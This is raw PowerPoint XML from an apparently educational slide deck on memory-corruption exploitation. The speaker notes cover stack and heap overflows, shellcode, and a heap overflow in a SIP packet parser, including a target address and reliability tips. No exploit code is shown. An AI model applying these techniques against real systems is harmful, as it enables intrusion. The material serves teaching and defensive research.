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97" r:id="rId6"/>
    <p:sldId id="299" r:id="rId7"/>
    <p:sldId id="278" r:id="rId8"/>
    <p:sldId id="295" r:id="rId9"/>
    <p:sldId id="275" r:id="rId10"/>
    <p:sldId id="259" r:id="rId11"/>
    <p:sldId id="276" r:id="rId12"/>
    <p:sldId id="290" r:id="rId13"/>
    <p:sldId id="280" r:id="rId14"/>
    <p:sldId id="281" r:id="rId15"/>
    <p:sldId id="282" r:id="rId16"/>
    <p:sldId id="288" r:id="rId17"/>
    <p:sldId id="285" r:id="rId18"/>
    <p:sldId id="283" r:id="rId19"/>
    <p:sldId id="293" r:id="rId20"/>
    <p:sldId id="287" r:id="rId21"/>
    <p:sldId id="292" r:id="rId22"/>
    <p:sldId id="294" r:id="rId23"/>
    <p:sldId id="300" r:id="rId24"/>
    <p:sldId id="301"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Zutter, Joachim" initials="DJ" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="S-1-5-21-1687070456-790835859-1793780021-1817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44A"/>
    <a:srgbClr val="996633"/>
    <a:srgbClr val="6C0126"/>
    <a:srgbClr val="0099CC"/>
    <a:srgbClr val="FEF88A"/>
    <a:srgbClr val="9ECACC"/>
    <a:srgbClr val="FFFF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1141" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="3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24T11:45:37.833"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A0C63-78F7-4946-B9AD-8A566535DC69}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/7/2018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7C161C-DEA5-43AA-AB54-C3DF0ADB0908}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168049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7C161C-DEA5-43AA-AB54-C3DF0ADB0908}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2636176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contentLength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> are under the attacker’s control, and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>because</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> the size of the sent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>mBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> can be larger than claimed in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>contentLength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> field of the SIP header, an attacker can carefully craft the SIP packets to trigger a heap overflow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{897C161C-DEA5-43AA-AB54-C3DF0ADB0908}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3345806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address of a slightly smashed REGISTER packet buffer should be written to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>write_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>The 220 is a hardcoded value which causes overwriting of various memory chunks after the overflowing chunk. Even though this appeared to work reliably to write the address of the register packet buffer to 0x71A87210 while testing the exploit, heap normalization techniques could </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0"/>
              <a:t>be used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>to make the exploit even more reliable.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{897C161C-DEA5-43AA-AB54-C3DF0ADB0908}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2092294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7C161C-DEA5-43AA-AB54-C3DF0ADB0908}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="711659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Exploiting MS11-004: Microsoft IIS 7.5 remote heap buffer overflow http://phrack.org/issues/68/12.html (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FreeEntryOffset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> overwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> technique)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{897C161C-DEA5-43AA-AB54-C3DF0ADB0908}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2279968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7C161C-DEA5-43AA-AB54-C3DF0ADB0908}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4038356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7C161C-DEA5-43AA-AB54-C3DF0ADB0908}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2709387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7C161C-DEA5-43AA-AB54-C3DF0ADB0908}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2612958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discussing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> heap overflows we explain stack overflows because these are simpler to understand.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This example was taken from Wikipedia (https://en.wikipedia.org/wiki/Stack_buffer_overflow), more information about stack based buffer overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> exploits can be found there.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{897C161C-DEA5-43AA-AB54-C3DF0ADB0908}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2677463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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> show what happens on the stack when a stack buffer overflow occurs: the buffer c is too small, so the return address is overwritten.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>In practice the return address will likely be set to point to code that jumps/calls a CPU register that happens to be pointing somewhere inside the buffer at the time the function returns.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{897C161C-DEA5-43AA-AB54-C3DF0ADB0908}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1980631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Stack overflows were very</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> widespread and easy to exploit in ~2001.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The buffer had to be carefully crafted so the return address would</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> be set to the desired value.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{897C161C-DEA5-43AA-AB54-C3DF0ADB0908}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2924769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7C161C-DEA5-43AA-AB54-C3DF0ADB0908}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3846661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Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has to be position independent code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>LoadLibraryA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> addresses hardcoded, but it’s also possible to find these using the PEB (https://www.tophertimzen.com/blog/shellcodeTechniquesCPP/)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{897C161C-DEA5-43AA-AB54-C3DF0ADB0908}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2264394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Chunk1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> on the image is a used chunk, the others are freed memory chunks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> grows up towards higher addresses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>This image is an oversimplification: in practice the heap structures are more complicated for example split in a front-end and back-end heap allocator with associated data structures that can vary.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{897C161C-DEA5-43AA-AB54-C3DF0ADB0908}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424840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l="159" t="2943" r="316" b="13387"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-29183" y="0"/>
            <a:ext cx="12237396" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="12192001" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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53765" y="831413"/>
            <a:ext cx="1310450" cy="308646"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4427538" y="833001"/>
            <a:ext cx="2101850" cy="1100139"/>
            <a:chOff x="5132388" y="592137"/>
            <a:chExt cx="2101850" cy="1100139"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Freeform 81"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5175250" y="601663"/>
              <a:ext cx="2058988" cy="1090613"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 221 w 1297"/>
                <a:gd name="T1" fmla="*/ 0 h 687"/>
                <a:gd name="T2" fmla="*/ 1297 w 1297"/>
                <a:gd name="T3" fmla="*/ 0 h 687"/>
                <a:gd name="T4" fmla="*/ 1297 w 1297"/>
                <a:gd name="T5" fmla="*/ 381 h 687"/>
                <a:gd name="T6" fmla="*/ 986 w 1297"/>
                <a:gd name="T7" fmla="*/ 687 h 687"/>
                <a:gd name="T8" fmla="*/ 0 w 1297"/>
                <a:gd name="T9" fmla="*/ 687 h 687"/>
                <a:gd name="T10" fmla="*/ 0 w 1297"/>
                <a:gd name="T11" fmla="*/ 207 h 687"/>
                <a:gd name="T12" fmla="*/ 221 w 1297"/>
                <a:gd name="T13" fmla="*/ 0 h 687"/>
                <a:gd name="T14" fmla="*/ 221 w 1297"/>
                <a:gd name="T15" fmla="*/ 0 h 687"/>
                <a:gd name="T16" fmla="*/ 0 w 1297"/>
                <a:gd name="T17" fmla="*/ 207 h 687"/>
                <a:gd name="T18" fmla="*/ 0 w 1297"/>
                <a:gd name="T19" fmla="*/ 20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7" h="687">
                  <a:moveTo>
                    <a:pt x="221" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1297" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1297" y="381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="986" y="687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="207"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="221" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="221" y="0"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="0" y="207"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="207"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="7938" cap="flat">
              <a:solidFill>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="50196"/>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2" name="Group 11"/>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5132388" y="592137"/>
              <a:ext cx="1635125" cy="890588"/>
              <a:chOff x="5132388" y="592137"/>
              <a:chExt cx="1635125" cy="890588"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="50196"/>
              </a:schemeClr>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Freeform 82"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5132388" y="592137"/>
                <a:ext cx="95250" cy="93663"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 40 w 46"/>
                  <a:gd name="T1" fmla="*/ 17 h 46"/>
                  <a:gd name="T2" fmla="*/ 29 w 46"/>
                  <a:gd name="T3" fmla="*/ 17 h 46"/>
                  <a:gd name="T4" fmla="*/ 29 w 46"/>
                  <a:gd name="T5" fmla="*/ 6 h 46"/>
                  <a:gd name="T6" fmla="*/ 23 w 46"/>
                  <a:gd name="T7" fmla="*/ 0 h 46"/>
                  <a:gd name="T8" fmla="*/ 17 w 46"/>
                  <a:gd name="T9" fmla="*/ 6 h 46"/>
                  <a:gd name="T10" fmla="*/ 17 w 46"/>
                  <a:gd name="T11" fmla="*/ 17 h 46"/>
                  <a:gd name="T12" fmla="*/ 6 w 46"/>
                  <a:gd name="T13" fmla="*/ 17 h 46"/>
                  <a:gd name="T14" fmla="*/ 0 w 46"/>
                  <a:gd name="T15" fmla="*/ 23 h 46"/>
                  <a:gd name="T16" fmla="*/ 6 w 46"/>
                  <a:gd name="T17" fmla="*/ 29 h 46"/>
                  <a:gd name="T18" fmla="*/ 17 w 46"/>
                  <a:gd name="T19" fmla="*/ 29 h 46"/>
                  <a:gd name="T20" fmla="*/ 17 w 46"/>
                  <a:gd name="T21" fmla="*/ 41 h 46"/>
                  <a:gd name="T22" fmla="*/ 23 w 46"/>
                  <a:gd name="T23" fmla="*/ 46 h 46"/>
                  <a:gd name="T24" fmla="*/ 29 w 46"/>
                  <a:gd name="T25" fmla="*/ 41 h 46"/>
                  <a:gd name="T26" fmla="*/ 29 w 46"/>
                  <a:gd name="T27" fmla="*/ 29 h 46"/>
                  <a:gd name="T28" fmla="*/ 40 w 46"/>
                  <a:gd name="T29" fmla="*/ 29 h 46"/>
                  <a:gd name="T30" fmla="*/ 46 w 46"/>
                  <a:gd name="T31" fmla="*/ 23 h 46"/>
                  <a:gd name="T32" fmla="*/ 40 w 46"/>
                  <a:gd name="T33" fmla="*/ 1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46">
                    <a:moveTo>
                      <a:pt x="40" y="17"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="17"/>
                      <a:pt x="29" y="17"/>
                      <a:pt x="29" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="6"/>
                      <a:pt x="29" y="6"/>
                      <a:pt x="29" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="3"/>
                      <a:pt x="26" y="0"/>
                      <a:pt x="23" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="0"/>
                      <a:pt x="17" y="3"/>
                      <a:pt x="17" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="17"/>
                      <a:pt x="17" y="17"/>
                      <a:pt x="17" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="17"/>
                      <a:pt x="6" y="17"/>
                      <a:pt x="6" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="17"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="0" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="26"/>
                      <a:pt x="2" y="29"/>
                      <a:pt x="6" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="29"/>
                      <a:pt x="17" y="29"/>
                      <a:pt x="17" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="41"/>
                      <a:pt x="17" y="41"/>
                      <a:pt x="17" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="44"/>
                      <a:pt x="20" y="46"/>
                      <a:pt x="23" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="46"/>
                      <a:pt x="29" y="44"/>
                      <a:pt x="29" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="29"/>
                      <a:pt x="29" y="29"/>
                      <a:pt x="29" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="29"/>
                      <a:pt x="40" y="29"/>
                      <a:pt x="40" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="29"/>
                      <a:pt x="46" y="26"/>
                      <a:pt x="46" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="20"/>
                      <a:pt x="44" y="17"/>
                      <a:pt x="4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3"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6521450" y="1160463"/>
                <a:ext cx="131763" cy="130175"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 32 w 64"/>
                  <a:gd name="T1" fmla="*/ 63 h 63"/>
                  <a:gd name="T2" fmla="*/ 0 w 64"/>
                  <a:gd name="T3" fmla="*/ 32 h 63"/>
                  <a:gd name="T4" fmla="*/ 32 w 64"/>
                  <a:gd name="T5" fmla="*/ 0 h 63"/>
                  <a:gd name="T6" fmla="*/ 32 w 64"/>
                  <a:gd name="T7" fmla="*/ 6 h 63"/>
                  <a:gd name="T8" fmla="*/ 7 w 64"/>
                  <a:gd name="T9" fmla="*/ 32 h 63"/>
                  <a:gd name="T10" fmla="*/ 32 w 64"/>
                  <a:gd name="T11" fmla="*/ 57 h 63"/>
                  <a:gd name="T12" fmla="*/ 58 w 64"/>
                  <a:gd name="T13" fmla="*/ 32 h 63"/>
                  <a:gd name="T14" fmla="*/ 64 w 64"/>
                  <a:gd name="T15" fmla="*/ 32 h 63"/>
                  <a:gd name="T16" fmla="*/ 32 w 64"/>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3">
                    <a:moveTo>
